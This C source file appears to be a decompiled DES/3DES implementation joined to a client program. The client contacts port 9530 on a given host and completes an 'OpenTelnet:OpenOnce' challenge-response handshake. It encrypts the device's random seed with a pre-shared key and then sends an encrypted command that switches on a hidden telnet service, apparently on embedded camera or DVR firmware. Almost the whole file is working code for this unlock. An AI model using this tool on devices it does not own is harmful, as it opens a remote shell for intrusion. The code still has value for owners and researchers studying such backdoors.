    0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11,
    0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19,
    0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x01,
    0x0e, 0x04, 0x0d, 0x01, 0x02, 0x0f, 0x0b, 0x08, 0x03, 0x0a, 0x06, 0x0c,
    0x05, 0x09, 0x00, 0x07, 0x00, 0x0f, 0x07, 0x04, 0x0e, 0x02, 0x0d, 0x01,
    0x0a, 0x06, 0x0c, 0x0b, 0x09, 0x05, 0x03, 0x08, 0x04, 0x01, 0x0e, 0x08,
    0x0d, 0x06, 0x02, 0x0b, 0x0f, 0x0c, 0x09, 0x07, 0x03, 0x0a, 0x05, 0x00,
    0x0f, 0x0c, 0x08, 0x02, 0x04, 0x09, 0x01, 0x07, 0x05, 0x0b, 0x03, 0x0e,
    0x0a, 0x00, 0x06, 0x0d, 0x0f, 0x01, 0x08, 0x0e, 0x06, 0x0b, 0x03, 0x04,
    0x09, 0x07, 0x02, 0x0d, 0x0c, 0x00, 0x05, 0x0a, 0x03, 0x0d, 0x04, 0x07,
    0x0f, 0x02, 0x08, 0x0e, 0x0c, 0x00, 0x01, 0x0a, 0x06, 0x09, 0x0b, 0x05,
    0x00, 0x0e, 0x07, 0x0b, 0x0a, 0x04, 0x0d, 0x01, 0x05, 0x08, 0x0c, 0x06,
    0x09, 0x03, 0x02, 0x0f, 0x0d, 0x08, 0x0a, 0x01, 0x03, 0x0f, 0x04, 0x02,
    0x0b, 0x06, 0x07, 0x0c, 0x00, 0x05, 0x0e, 0x09, 0x0a, 0x00, 0x09, 0x0e,
    0x06, 0x03, 0x0f, 0x05, 0x01, 0x0d, 0x0c, 0x07, 0x0b, 0x04, 0x02, 0x08,
    0x0d, 0x07, 0x00, 0x09, 0x03, 0x04, 0x06, 0x0a, 0x02, 0x08, 0x05, 0x0e,
    0x0c, 0x0b, 0x0f, 0x01, 0x0d, 0x06, 0x04, 0x09, 0x08, 0x0f, 0x03, 0x00,
    0x0b, 0x01, 0x02, 0x0c, 0x05, 0x0a, 0x0e, 0x07, 0x01, 0x0a, 0x0d, 0x00,
    0x06, 0x09, 0x08, 0x07, 0x04, 0x0f, 0x0e, 0x03, 0x0b, 0x05, 0x02, 0x0c,
    0x07, 0x0d, 0x0e, 0x03, 0x00, 0x06, 0x09, 0x0a, 0x01, 0x02, 0x08, 0x05,
    0x0b, 0x0c, 0x04, 0x0f, 0x0d, 0x08, 0x0b, 0x05, 0x06, 0x0f, 0x00, 0x03,
    0x04, 0x07, 0x02, 0x0c, 0x01, 0x0a, 0x0e, 0x09, 0x0a, 0x06, 0x09, 0x00,
    0x0c, 0x0b, 0x07, 0x0d, 0x0f, 0x01, 0x03, 0x0e, 0x05, 0x02, 0x08, 0x04,
    0x03, 0x0f, 0x00, 0x06, 0x0a, 0x01, 0x0d, 0x08, 0x09, 0x04, 0x05, 0x0b,
    0x0c, 0x07, 0x02, 0x0e, 0x02, 0x0c, 0x04, 0x01, 0x07, 0x0a, 0x0b, 0x06,
    0x08, 0x05, 0x03, 0x0f, 0x0d, 0x00, 0x0e, 0x09, 0x0e, 0x0b, 0x02, 0x0c,
    0x04, 0x07, 0x0d, 0x01, 0x05, 0x00, 0x0f, 0x0a, 0x03, 0x09, 0x08, 0x06,
    0x04, 0x02, 0x01, 0x0b, 0x0a, 0x0d, 0x07, 0x08, 0x0f, 0x09, 0x0c, 0x05,
    0x06, 0x03, 0x00, 0x0e, 0x0b, 0x08, 0x0c, 0x07, 0x01, 0x0e, 0x02, 0x0d,
    0x06, 0x0f, 0x00, 0x09, 0x0a, 0x04, 0x05, 0x03, 0x0c, 0x01, 0x0a, 0x0f,
    0x09, 0x02, 0x06, 0x08, 0x00, 0x0d, 0x03, 0x04, 0x0e, 0x07, 0x05, 0x0b,
    0x0a, 0x0f, 0x04, 0x02, 0x07, 0x0c, 0x09, 0x05, 0x06, 0x01, 0x0d, 0x0e,
    0x00, 0x0b, 0x03, 0x08, 0x09, 0x0e, 0x0f, 0x05, 0x02, 0x08, 0x0c, 0x03,
    0x07, 0x00, 0x04, 0x0a, 0x01, 0x0d, 0x0b, 0x06, 0x04, 0x03, 0x02, 0x0c,
    0x09, 0x05, 0x0f, 0x0a, 0x0b, 0x0e, 0x01, 0x07, 0x06, 0x00, 0x08, 0x0d,
    0x04, 0x0b, 0x02, 0x0e, 0x0f, 0x00, 0x08, 0x0d, 0x03, 0x0c, 0x09, 0x07,
    0x05, 0x0a, 0x06, 0x01, 0x0d, 0x00, 0x0b, 0x07, 0x04, 0x09, 0x01, 0x0a,
    0x0e, 0x03, 0x05, 0x0c, 0x02, 0x0f, 0x08, 0x06, 0x01, 0x04, 0x0b, 0x0d,
    0x0c, 0x03, 0x07, 0x0e, 0x0a, 0x0f, 0x06, 0x08, 0x00, 0x05, 0x09, 0x02,
    0x06, 0x0b, 0x0d, 0x08, 0x01, 0x04, 0x0a, 0x07, 0x09, 0x05, 0x00, 0x0f,
    0x0e, 0x02, 0x03, 0x0c, 0x0d, 0x02, 0x08, 0x04, 0x06, 0x0f, 0x0b, 0x01,
    0x0a, 0x09, 0x03, 0x0e, 0x05, 0x00, 0x0c, 0x07, 0x01, 0x0f, 0x0d, 0x08,
    0x0a, 0x03, 0x07, 0x04, 0x0c, 0x05, 0x06, 0x0b, 0x00, 0x0e, 0x09, 0x02,
    0x07, 0x0b, 0x04, 0x01, 0x09, 0x0c, 0x0e, 0x02, 0x00, 0x06, 0x0a, 0x0d,
    0x0f, 0x03, 0x05, 0x08, 0x02, 0x01, 0x0e, 0x07, 0x04, 0x0a, 0x08, 0x0d,
    0x0f, 0x0c, 0x09, 0x00, 0x03, 0x05, 0x06, 0x0b, 0x10, 0x07, 0x14, 0x15,
    0x1d, 0x0c, 0x1c, 0x11, 0x01, 0x0f, 0x17, 0x1a, 0x05, 0x12, 0x1f, 0x0a,
    0x02, 0x08, 0x18, 0x0e, 0x20, 0x1b, 0x03, 0x09, 0x13, 0x0d, 0x1e, 0x06,
    0x16, 0x0b, 0x04, 0x19, 0x3a, 0x32, 0x2a, 0x22, 0x1a, 0x12, 0x0a, 0x02,
    0x3c, 0x34, 0x2c, 0x24, 0x1c, 0x14, 0x0c, 0x04, 0x3e, 0x36, 0x2e, 0x26,
    0x1e, 0x16, 0x0e, 0x06, 0x40, 0x38, 0x30, 0x28, 0x20, 0x18, 0x10, 0x08,
    0x39, 0x31, 0x29, 0x21, 0x19, 0x11, 0x09, 0x01, 0x3b, 0x33, 0x2b, 0x23,
    0x1b, 0x13, 0x0b, 0x03, 0x3d, 0x35, 0x2d, 0x25, 0x1d, 0x15, 0x0d, 0x05,
    0x3f, 0x37, 0x2f, 0x27, 0x1f, 0x17, 0x0f, 0x07, 0xf4, 0x63, 0x01, 0x00,
    0x28, 0x08, 0x30, 0x10, 0x38, 0x18, 0x40, 0x20, 0x27, 0x07, 0x2f, 0x0f,
    0x37, 0x17, 0x3f, 0x1f, 0x26, 0x06, 0x2e, 0x0e, 0x36, 0x16, 0x3e, 0x1e,
    0x25, 0x05, 0x2d, 0x0d, 0x35, 0x15, 0x3d, 0x1d, 0x24, 0x04, 0x2c, 0x0c,
    0x34, 0x14, 0x3c, 0x1c, 0x23, 0x03, 0x2b, 0x0b, 0x33, 0x13, 0x3b, 0x1b,
    0x22, 0x02, 0x2a, 0x0a, 0x32, 0x12, 0x3a, 0x1a, 0x21, 0x01, 0x29, 0x09,
    0x31, 0x11, 0x39, 0x19, 0x39, 0x31, 0x29, 0x21, 0x19, 0x11, 0x09, 0x01,
    0x3a, 0x32, 0x2a, 0x22, 0x1a, 0x12, 0x0a, 0x02, 0x3b, 0x33, 0x2b, 0x23,
    0x1b, 0x13, 0x0b, 0x03, 0x3c, 0x34, 0x2c, 0x24, 0x3f, 0x37, 0x2f, 0x27,
    0x1f, 0x17, 0x0f, 0x07, 0x3e, 0x36, 0x2e, 0x26, 0x1e, 0x16, 0x0e, 0x06,
    0x3d, 0x35, 0x2d, 0x25, 0x1d, 0x15, 0x0d, 0x05, 0x1c, 0x14, 0x0c, 0x04,
    0x50, 0x64, 0x01, 0x00, 0x01, 0x01, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02,
    0x01, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x01, 0x0e, 0x11, 0x0b, 0x18,
    0x01, 0x05, 0x03, 0x1c, 0x0f, 0x06, 0x15, 0x0a, 0x17, 0x13, 0x0c, 0x04,
    0x1a, 0x08, 0x10, 0x07, 0x1b, 0x14, 0x0d, 0x02, 0x29, 0x34, 0x1f, 0x25,
    0x2f, 0x37, 0x1e, 0x28, 0x33, 0x2d, 0x21, 0x30, 0x2c, 0x31, 0x27, 0x38,
    0x22, 0x35, 0x2e, 0x2a, 0x32, 0x24, 0x1d, 0x20
};

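/* Unpack `size` bits from src into dst, one bit per output byte,
   least-significant bit of each source byte first. */
void init_cipher_offset_vector(byte *dst,byte *src,int size)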

{
  int i;
  
  i = 0;
  while (i < size) {
    dst[i] = (byte)((int)(uint)src[i >> 3] >> (i & 7U)) & 1;
    i = i + 1;
  }
  return;
}

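/* Apply a permutation table: out[i] = src[offset_vector[i] - 1] (table entries are 1-based).
   The result is built in the scratch area at `state`, so dst may alias src. */
void apply_cipher_offset_vector(byte *dst,byte *src,byte *offset_vector,size_t size)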

{
  int i;
  
  i = 0;
  while (i < (int)size) {
    state[i] = src[(uint)offset_vector[i] - 1];
    i = i + 1;
  }
  memcpy(dst,state,size);
  return;
}

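void cipher_memcpy_shuffle(void *dst,size_t size)

{
  byte *p = (byte *)dst;

  /* Rotate the 0x1c-entry array left by `size` positions. */
  memcpy(state,p,size);
  /* Source and destination overlap here, so memmove is required (memcpy is undefined). */
  memmove(p,p + size,0x1c - size);
  memcpy(p + (0x1c - size),state,size);
  return;
}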

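/* Key schedule: expand the 8 key bytes at src into 16 round subkeys of 0x30 bits each at dst.
   The tables at datum + 0x2d4, datum + 0x310 and datum + 0x320 hold the values of the
   DES PC-1 permutation, per-round shift counts and PC-2 permutation. */
void init_cipher_state(void *dst,void *src)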

{
  byte current_byte;
  int i;
  
  init_cipher_offset_vector(state + 0x190,(byte *)src,0x40);
  apply_cipher_offset_vector(state + 0x190,state + 0x190,datum + 0x2d4,0x38);
  i = 0;
  do {
    current_byte = (datum + 0x310)[i];
    i = i + 1;
    cipher_memcpy_shuffle(state + 0x190,(uint)current_byte);
    cipher_memcpy_shuffle(state + 0x190 + 0x1c,(uint)current_byte);
    apply_cipher_offset_vector((byte *)dst,state + 0x190,datum + 0x320,0x30);
    dst = (byte *)dst + 0x30;
  } while (i != 0x10);
  return;
}

void cipher_xor(byte *data,byte *key,int size)

{
  int i;

  i = 0;
  while (i < size) {
    data[i] = key[i] ^ data[i];
    i = i + 1;
  }
  return;
}

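/* Zero-pad or truncate the key to 16 bytes and build the key schedule from bytes 0..7.
   If the key is longer than 8 bytes, build a second schedule from bytes 8..15 and
   set the flag at state + 0x7e0 so that encrypt/decrypt run three passes per block. */
void prepare_key(void *key,size_t key_size)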

{
  size_t __n;

  memset(state + 0x1d0,0,0x10);
  __n = key_size;
  if (0xf < (int)key_size) {
    __n = 0x10;
  }
  memcpy(state + 0x1d0,key,__n);
  init_cipher_state(state + 0x1e0,state + 0x1d0);
  if (8 < (int)key_size) {
    init_cipher_state(state + 0x4e0,state + 0x1d8);
  }
  *(state + 0x7e0) = 8 < (int)key_size; // !!!! recheck size
  return;
}

void cipher_shuffle(byte *dst,byte *src)

{
  byte *caretPtr;
  int iVar1;
  byte *ptr;
  int i;
  
  apply_cipher_offset_vector(state + 0x100,dst,datum,0x30);
  cipher_xor(state + 0x100,src,0x30);
  ptr = state + 0x100;
  i = 0;
  do {
    iVar1 = i + (uint)ptr[5] + (uint)*ptr * 2;
    caretPtr = dst + i;
    i = i + 4;
    init_cipher_offset_vector
              (caretPtr,datum + 0x30 +
                        (uint)ptr[2] * 4 + (uint)ptr[1] * 8 + (uint)ptr[4] + (uint)ptr[3] * 2 +
                        iVar1 * 0x10,4);
    ptr = ptr + 6;
  } while (i != 0x20);
  apply_cipher_offset_vector(dst,dst,datum + 0x230,0x20);
  return;
}

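/* Process one 8-byte block: initial permutation (datum + 0x250), 16 rounds,
   final permutation (datum + 0x294). direction == 0 walks the 16 subkeys forward,
   any other value walks them backward. */
void cipher_box(byte *result,byte *data,byte *offset_vector,int direction)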

{
  uint i;
  byte *backward_ov_ptr;
  byte *forward_ov_ptr;
  int iVar3;

  init_cipher_offset_vector(state + 0x130,data,0x40);
  apply_cipher_offset_vector(state + 0x130,state + 0x130,datum + 0x250,0x40);
  if (direction == 0) {
    forward_ov_ptr = offset_vector + 0x300;
    do {
      memcpy(state + 0x170,state + 0x150,0x20);
      cipher_shuffle(state + 0x150,offset_vector);
      cipher_xor(state + 0x150,state + 0x130,0x20);
      memcpy(state + 0x130, state + 0x170, 0x20);
      offset_vector = offset_vector + 0x30;
    } while (offset_vector != forward_ov_ptr);
  }
  else {
    backward_ov_ptr = offset_vector + 0x2d0;
    do {
      memcpy(state + 0x170,state + 0x130,0x20);
      cipher_shuffle(state + 0x130,backward_ov_ptr);
      cipher_xor(state + 0x130,state + 0x150,0x20);
      backward_ov_ptr -= 0x30;
      memcpy(state + 0x150,state + 0x170,0x20);
    } while (backward_ov_ptr != offset_vector + -0x30);
  }
  apply_cipher_offset_vector(state + 0x130,state + 0x130,datum + 0x294,0x40);
  memset(result,0,8);
  i = 0;
  do {
    result[i >> 3] = result[i >> 3] | *(char *)(state + 0x130 + i) << (i & 7);
    i = i + 1;
  } while (i != 0x40);
  return;
}

int decrypt(char *result,char *data,uint data_len,char *key,uint key_len)

{
  uint short_key_iter;
  int curBlockNumber;
  int blockCount;

  if (((result != (char *)0x0 && data != (char *)0x0) && (curBlockNumber = 0, key != (char *)0x0))
     && ((data_len + 7 & 0xfffffff8) != 0)) {
    prepare_key(key,key_len);
    blockCount = (int)(data_len + 7) >> 3;
    short_key_iter = *(state + 0x7e0);
    if (*(state + 0x7e0) == 0) {
      while ((int)short_key_iter < blockCount) {
        cipher_box((byte *)result,(byte *)data,state + 0x1e0,1);
        short_key_iter = short_key_iter + 1;
        result = (char *)((byte *)result + 8);
        data = (char *)((byte *)data + 8);
      }
    }
    else {
      while (curBlockNumber < blockCount) {
        cipher_box((byte *)result,(byte *)data,state + 0x1e0,1);
        cipher_box((byte *)result,(byte *)result,state + 0x4e0,0);
        cipher_box((byte *)result,(byte *)result,state + 0x1e0,1);
        curBlockNumber = curBlockNumber + 1;
        result = (char *)((byte *)result + 8);
        data = (char *)((byte *)data + 8);
      }
    }
    return 0;
  }
  return -1;
}

int encrypt(char *result,char *data,uint data_len,char *key,uint key_size)

{
  uint uVar2;
  int currentBlockNumber;
  int blocksCount;
  
  if (((result != (char *)0x0 && data != (char *)0x0) &&
      (currentBlockNumber = 0, key != (char *)0x0)) && ((data_len + 7 & 0xfffffff8) != 0)) {
    prepare_key(key,key_size);
    blocksCount = (int)(data_len + 7) >> 3;
    uVar2 = *(state + 0x7e0);
    if (*(state + 0x7e0) == 0) {
      while ((int)uVar2 < blocksCount) {
        cipher_box((byte *)result,(byte *)data,state + 0x1e0,0);
        uVar2 = uVar2 + 1;
        result = (char *)((byte *)result + 8);
        data = (char *)((byte *)data + 8);
      }
    }
    else {
      while (currentBlockNumber < blocksCount) {
        cipher_box((byte *)result,(byte *)data,state + 0x1e0,0);
        cipher_box((byte *)result,(byte *)result,state + 0x4e0,1);
        cipher_box((byte *)result,(byte *)result,state + 0x1e0,0);
        currentBlockNumber = currentBlockNumber + 1;
        result = (char *)((byte *)result + 8);
        data = (char *)((byte *)data + 8);
      }
    }
    return 0;
  }
  return -1;
}

void tohex(unsigned char * in, size_t insz, char * out, size_t outsz)
{
    unsigned char * pin = in;
    const char * hex = "0123456789ABCDEF";
    char * pout = out;
    if (outsz == 0) {
        return;
    }
    if (insz == 0 || outsz < 3) {
        /* Nothing to convert, or no room for even one "XX:" group */
        out[0] = 0;
        return;
    }
    for(; pin < in+insz; pout +=3, pin++){
        /* Check before writing: better to truncate the output string than overflow the buffer */
        if ((size_t)(pout - out) + 3 > outsz){
            break;
        }
        pout[0] = hex[(*pin>>4) & 0xF];
        pout[1] = hex[ *pin     & 0xF];
        pout[2] = ':';
    }
    /* At least one group was written, so this replaces the trailing ':' */
    pout[-1] = 0;
}

char netbuf[4096];

#define PADDED(X) (((X + 7) / 8) * 8)
#define PORT 9530
#define BUFSIZE sizeof(netbuf)
#define CMD_FIRST "OpenTelnet:OpenOnce"
#define CHALLENGE_PROLOGUE "randNum:"
#define VERIFY_OK "verify:OK"
#define CMD_FINAL "CMD:"
#define FINAL_PAYLOAD "Telnet:OpenOnce"
#define OPEN_OK "Open:OK"

ssize_t send_str(int sockfd, char *str, size_t len) {
    if (len > 0xFE) {
        return -1;
    }
    char buf[len+1];
    buf[0] = len + 1;
    memcpy(buf + 1, str, len);
    return send(sockfd, buf, len + 1, 0);
}

int main(int argc, char* argv[]) {
    int sockfd, numbytes;
    struct hostent *he;
    struct sockaddr_in their_addr;

    if (argc != 3) {
        fprintf(stderr, "Usage: %s <host> <PSK>\n", argv[0]);
        return 2;
    }

    if ((he=gethostbyname(argv[1])) == NULL) {  /* get the host info */
        herror("gethostbyname");
        return 1;
    }

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        perror("socket");
        return 1;
    }

    their_addr.sin_family = AF_INET;      /* host byte order */
    their_addr.sin_port = htons(PORT);    /* short, network byte order */
    their_addr.sin_addr = *((struct in_addr *)he->h_addr);
    bzero(&(their_addr.sin_zero), 8);     /* zero the rest of the struct */

    if (connect(sockfd, (struct sockaddr *)&their_addr, \
                                              sizeof(struct sockaddr)) == -1) {
        perror("connect");
        return 1;
    }
    if (send_str(sockfd, CMD_FIRST, sizeof(CMD_FIRST)) == -1) {
        perror("send");
        return 1;
    }
    printf("Sent %s command.\n", CMD_FIRST);
    bzero(netbuf, BUFSIZE);
    if ((numbytes=recv(sockfd, netbuf, BUFSIZE - 1, 0)) == -1) {
        perror("recv");
        return 1;
    }
    puts(netbuf);
    if (memcmp(netbuf, CHALLENGE_PROLOGUE, sizeof(CHALLENGE_PROLOGUE) - 1) != 0) {
        fprintf(stderr, "No challenge received.\n");
        return 3;
    }

    char *seed = netbuf + sizeof(CHALLENGE_PROLOGUE) - 1;
    char challengeStr[strlen(seed) + strlen(argv[2]) + 1];
    size_t challengeLen = sprintf(challengeStr, "%s%s", seed, argv[2]);
    printf("challenge=%s\n", challengeStr);

    char encryptedRandomSeed[PADDED(challengeLen)];
    encrypt(encryptedRandomSeed, seed, strlen(seed), challengeStr, challengeLen);
    memcpy(netbuf, CHALLENGE_PROLOGUE, sizeof(CHALLENGE_PROLOGUE) - 1);
    memcpy(netbuf + sizeof(CHALLENGE_PROLOGUE) - 1, encryptedRandomSeed, PADDED(challengeLen));
    if (send_str(sockfd, netbuf, sizeof(CHALLENGE_PROLOGUE) - 1 + PADDED(challengeLen)) == -1) {
        perror("send");
        return 1;
    }
    bzero(netbuf, BUFSIZE);
    if ((numbytes=recv(sockfd, netbuf, BUFSIZE - 1, 0)) == -1) {
        perror("recv");
        return 1;
    }
    puts(netbuf);
    if (memcmp(netbuf, VERIFY_OK, sizeof(VERIFY_OK) - 1) != 0) {
        fprintf(stderr, "Verification failed.\n");
        return 4;
    }
    char encryptedFinal[PADDED(sizeof(FINAL_PAYLOAD))];
    encrypt(encryptedFinal, FINAL_PAYLOAD, sizeof(FINAL_PAYLOAD), challengeStr, challengeLen);
    memcpy(netbuf, CMD_FINAL, sizeof(CMD_FINAL) - 1);
    memcpy(netbuf + sizeof(CMD_FINAL) - 1, encryptedFinal, sizeof(encryptedFinal));
    if (send_str(sockfd, netbuf, sizeof(CMD_FINAL) - 1 + sizeof(encryptedFinal)) == -1) {
        perror("send");
        return 1;
    }
    bzero(netbuf, BUFSIZE);
    if ((numbytes=recv(sockfd, netbuf, BUFSIZE - 1, 0)) == -1) {
        perror("recv");
        return 1;
    }
    puts(netbuf);
    if (memcmp(netbuf, OPEN_OK, sizeof(OPEN_OK) - 1)) {
        fprintf(stderr, "Open failed.\n");
        return 5;
    }
    
    return 0;
}

#